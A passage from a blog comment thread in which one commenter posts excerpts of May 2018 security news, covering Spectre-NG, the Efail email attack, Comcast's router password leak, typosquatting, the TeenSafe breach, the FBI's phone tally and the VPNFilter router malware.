    Germany calls on chip and hardware makers to tackle processor flaws
    https://www.reuters.com/article/us-cyber-germany/germany-calls-on-chip-and-hardware-makers-to-tackle-processor-flaws-idUSKCN1IJ2H3

    Germany’s federal cyber agency called on chip and hardware-makers to address new vulnerabilities discovered in computer central processing units, but said no complete fix was possible at the moment.

    The BSI agency said its analysis showed the new flaws, dubbed Spectre-Next Generation, resembled the Meltdown and Spectre bugs discovered in January and could allow attackers to access personal data such as passwords and encryption keys.

    While no new attacks were known outside laboratories, there was a risk that attackers could develop new methods based on detailed information that had been disclosed, it added.

    Reply
  39. Tomi Engdahl says:

    Explaining Efail and Why It Isn’t the End of Email Privacy
    https://hackaday.com/2018/05/21/explaining-efail-and-why-it-isnt-the-end-of-email-privacy/

    Last week the PGPocalipse was all over the news… Except that, well, it wasn’t an apocalypse.

    A team of researchers published a paper(PDF) where they describe how to decrypt a PGP encrypted email via a targeted attack. The research itself is pretty well documented and, from a security researcher perspective, it’s a good paper to read, especially the cryptography parts.

    But we here at Hackaday were skeptical about media claims that Efail had broken PGP. Some media reports went as far as recommending everyone turn off PGP encryption on all email clients., but they weren’t able to back this recommendation up with firm reasoning. In fact, Efail isn’t an immediate threat for the vast majority of people simply because an attacker must already have access to an encrypted email to use the exploit. Advising everyone to disable encryption all together just makes no sense.

    Aside from the massive false alarm, Efail is a very interesting exploi

    Efail Does Not Directly Exploit PGP

    In a nutshell, if an attacker is able to get access to a user’s encrypted email, they can modify the message in a specific way and send it back to the user. The user’s email client will the decrypt the message and (if the email client is rendering HTML tags) automatically send the decrypted message back to the attacker.

    The encryption itself it is not broken in any way. It’s how the messages are processed by the user’s email client that introduces the vulnerability. Saying PGP is broken is just plain wrong

    Efail Builds On the Concepts of Tracking Pixels

    Efail uses this kind of remote loading of images as the backchannel to exfiltrate the decrypted email. Other methods should also be possible. Efail takes advantage of the email client first has to decrypt an encrypted message in order to show it and then it renders the HTML code in the message.

    Malleability Gadgets

    We’ve seen how simple it is to implement a direct exfiltration channel in order to decrypt email. In some email clients, that technique does not work, so the Efail paper describes a more generic way to introduce the exfiltration channel inside the actually encrypted data itself.

    Conclusion

    My hopes is that the reader realizes two things: that the encryption of emails is still generically safe and that rendering HTML in emails is still not a good idea.

    To protect yourself against this vulnerability, and a lot of others, disable HTML rendering in your email client. Many email clients allow for this and/or have settings to disable the loading of remote content.

    Reply
  40. Tomi Engdahl says:

    Comcast is (update: was) leaking the names and passwords of customers’ wireless routers
    https://techcrunch.com/2018/05/21/comcast-is-leaking-the-names-and-passwords-of-customers-wireless-routers/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook

    Comcast has just been caught in a major security snafu: revealing the passwords of its customers’ Xfinity-provided wireless routers in plaintext on the web. Anyone with a subscriber’s account number and street address number will be served up the Wi-Fi name and password via the company’s Xfinity internet activation service.

    Update: Comcast has taken down the service in question. “There’s nothing more important than our customers’ security,” a Comcast representative said in a statement.

    Reply
  41. Tomi Engdahl says:

    How to prevent a typo from making you an identity theft victim
    https://www.washingtonpost.com/news/get-there/wp/2018/05/03/how-to-prevent-a-typo-from-making-you-an-identity-theft-victim/?noredirect=on&utm_term=.276621c04784

    I’ve typed in an Internet address and with the slip of a finger ended up on some funky website. One typo.

    Scammers love typos. And to capitalize on them, they hijack popular web addresses and cybersquat on URLs that are a typo away from legitimate websites. It’s a scheme called “typosquatting,” and it is intended to trick Internet users, according to Fraud.org, a project of the National Consumers League.

    “If a user is unlucky enough to mistakenly type in the wrong address, they may be taken to a booby-trapped website filled with viruses and malware, or to a website that looks just like the legitimate website but is designed to gather their personal data for scammers,”

    Close to 12 million online users visited potentially dangerous websites during the first quarter of this year

    Krebs warned readers that “malicious websites ending in ‘.cm’ that mimic some of the world’s most popular Internet destinations

    Here are two of the tips.
    — Double check what you’re typing.
    — Bookmark websites you visit often

    Reply
  42. Tomi Engdahl says:

    Amazon facial recognition software raises privacy concerns with the ACLU
    https://techcrunch.com/2018/05/22/amazon-facial-recognition-software-raises-privacy-concerns-with-the-aclu/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook

    Amazon hasn’t exactly kept Rekognition under wraps. In late 2016, the software giant talked up its facial detection software in a relatively benign AWS post announcing that the tech was already being implemented by The Washington County Sheriff’s Office in Oregon for suspect identification.

    The ACLU of Northern California is shining more light on the tech this week

    “raises profound civil liberties and civil rights concerns.”

    Reply
  43. Tomi Engdahl says:

    Teen monitoring app TeenSafe exposes thousands of passwords
    https://techcrunch.com/2018/05/21/teen-monitoring-app-teensafe-exposes-thousands-of-passwords/?utm_source=tcfbpage&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&sr_share=facebook

    U.K.-based security researcher Robert Wiggins has found two exposed TeenSafe servers, leaking the passwords and information of some users of the monitoring service.

    TeenSafe is meant to protect teenagers by letting their parents monitor their texts, phone calls, web history, location and app downloads. The breach was first reported by ZDNet.

    According to the report, TeenSafe left two of their servers, which were hosted on AWS, exposed and viewable by anyone.

    Reply
  44. Tomi Engdahl says:

    FBI’s flawed phone tally blamed on programming error. 7,800 unbreakable mobes? Er, um…
    We meant 1,000. Maybe 2,000
    https://www.theregister.co.uk/2018/05/23/feds_flawed_phone_tally_blamed_on_programming_error/

    The FBI apparently gilded the lily in its long campaign against consumer cryptography, telling the world it held more locked phones than it did.

    At issue is the Feds’ claim that it’s seized 7,000 phones it can’t crack because they’re encrypted.

    He upped the ante in December 2017, telling a Congressional budget hearing the FBI couldn’t access the content of “approximately 7,800 mobile devices” in spite of having the legal authority to.

    However, the Washington Post is now reporting that number was “inflated”, and instead, the FBI only has between 1,000 and 2,000 phones.

    The WashPo said the error was discovered about a month ago, and since then the FBI has been trying to get a more accurate count, and an audit could take weeks.

    The agency gave the newspaper a statement blaming the error on “programming errors” that delivered “significant over-counting of the devices reported”.

    Reply
  45. Tomi Engdahl says:

    Jim Finkle / Reuters:
    Cisco’s Talos cyber intelligence unit says 500K+ routers in dozens of countries have been infected by Russia-linked malware and could be used to attack Ukraine — (Reuters) – Cisco Systems Inc (CSCO.O) on Wednesday warned that hackers have infected at least 500,000 routers and storage devices …

    Cyber researchers, Ukraine warn of possible Russian attack
    https://www.reuters.com/article/us-cyber-routers-ukraine/cyber-firms-warn-on-suspected-russian-plan-to-attack-ukraine-idUSKCN1IO1U9

    Hackers have infected at least 500,000 routers and storage devices in dozens of countries, some of the world’s biggest cyber security firms warned on Wednesday, in a campaign that Ukraine said was preparation for a future Russian cyber attack.

    The U.S. Department of Homeland Security said it was investigating the malware, which targets devices from Linksys, MikroTik, Netgear Inc (NTGR.O), TP-Link and QNAP, advising users to install security updates.

    Cisco, which uncovered the campaign several months ago, alerted authorities in Ukraine and the United States before going public with its findings about the malware it dubbed VPNFilter.

    Cisco described the mechanisms that the malware uses to hide communications with hackers and a module that targets industrial networks like ones that operate electric grids, said Michael Daniel, chief executive officer of Cyber Threat Alliance, a nonprofit group.

    VPNFilter has infected devices in at least 54 countries, but by far the largest number is in Ukraine

    Reply
  46. Tomi Engdahl says:

    Yubico and LastPass bring NFC-based two-factor authentication to the iPhone
    https://www.zdnet.com/article/yubico-and-lastpass-bring-nfc-based-two-factor-authentication-to-the-iphone/

    Popular password manager LastPass delivers the first iOS app with support for the YubiKey NEO hardware-based authentication key with NFC support.

    Reply
  47. Tomi Engdahl says:

    Exclusive: FBI Seizes Control of Russian Botnet
    https://amp.thedailybeast.com/exclusive-fbi-seizes-control-of-russian-botnet

    FBI agents armed with a court order have seized control of a key server in the Kremlin’s global botnet of 500,000 hacked routers, The Daily Beast has learned. The move positions the bureau to build a comprehensive list of victims of the attack, and short-circuits Moscow’s ability to reinfect its targets.

    The FBI counter-operation goes after “VPN Filter,” a piece of sophisticated malware linked to the same Russian hacking group, known as Fancy Bear, that breached the Democratic National Committee and the Hillary Clinton campaign during the 2016 election.

    New VPNFilter malware targets at least 500K networking devices worldwide
    https://blog.talosintelligence.com/2018/05/VPNFilter.html

    Reply
  48. Tomi Engdahl says:

    VPNFilter: New Router Malware with Destructive Capabilities
    Unlike most other IoT threats, malware can survive reboot.
    https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware

    A new threat which targets a range of routers and NAS devices is capable of knocking out infected devices by rendering them unusable. The malware, known as VPNFilter, is unlike most other IoT threats because it is capable of maintaining a persistent presence on an infected device, even after a reboot. VPNFilter has a range of capabilities including spying on traffic being routed through the device. Its creators appear to have a particular interest in SCADA industrial control systems, creating a module which specifically intercepts Modbus SCADA communications.

    According to new research from Cisco Talos, activity surrounding the malware has stepped up in recent weeks and the attackers appear to be particularly interested in targets in Ukraine.

    Q: What devices are known to be affected by VPNFilter?

    A: To date, VPNFilter is known to be capable of infecting enterprise and small office/home office routers from Linksys, MikroTik, Netgear, and TP-Link, as well as QNAP network-attached storage (NAS) devices. These include:

    Linksys E1200
    Linksys E2500
    Linksys WRVS4400N
    Mikrotik RouterOS for Cloud Core Routers: Versions 1016, 1036, and 1072
    Netgear DGN2200
    Netgear R6400
    Netgear R7000
    Netgear R8000
    Netgear WNR1000
    Netgear WNR2000
    QNAP TS251
    QNAP TS439 Pro
    Other QNAP NAS devices running QTS software
    TP-Link R600VPN

    Q: How does VPNFilter infect affected devices?

    A: Most of the devices targeted are known to use default credentials and/or have known exploits, particularly for older versions. There is no indication at present that the exploit of zero-day vulnerabilities is involved in spreading the threat.

    Reply
  49. Tomi Engdahl says:

    Troy Hunt and Have i Been Pwned
    http://www.bosslevelpodcast.com/troy-hunt-and-have-i-been-pwned/

    My guest for this episode is Troy Hunt, well known security expert and creator of haveibeenpwned.com. It’s a service which allows you to check, whether your email has been leaked as a part of a data breach.

    We talk about online security, including securing your accounts and using a password manager.

    Reply

Leave a Reply to Tomi Engdahl Cancel reply

Your email address will not be published. Required fields are marked *

*

*